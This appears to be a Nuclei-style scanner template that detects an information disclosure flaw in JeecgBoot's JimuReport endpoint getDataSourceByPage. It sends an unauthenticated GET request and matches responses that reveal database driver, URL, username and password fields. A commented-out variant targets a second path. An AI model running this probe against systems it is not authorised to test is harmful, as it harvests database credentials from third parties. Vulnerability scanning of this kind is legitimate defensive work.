id: JeecgBoot-getDataSourceByPage-Information-disclosure

info:
  name: JeecgBoot 积木报表 getDataSourceByPage 信息泄露漏洞
  author: JeecgBoot
  severity: medium
  tags: Information disclosure

http:
  - raw:
      - |
        GET /jmreport/getDataSourceByPage HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dbDriver"'
          - '"dbUrl"'
          - '"dbUsername"'
          - '"dbPassword"'
        condition: and
      - type: status
        status: 
          - 200
  # - raw:
  #     - |
  #       GET /jeecg-boot/jmreport/getDataSourceByPage HTTP/1.1
  #       Host: {{Hostname}}
  #       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
  #   matchers-condition: and
  #   matchers:
  #     - type: word
  #       part: body
  #       words:
  #         - '"dbDriver"'
  #         - '"dbUrl"'
  #         - '"dbUsername"'
  #         - '"dbPassword"'
  #       condition: and
  #     - type: status
  #       status: 
  #         - 200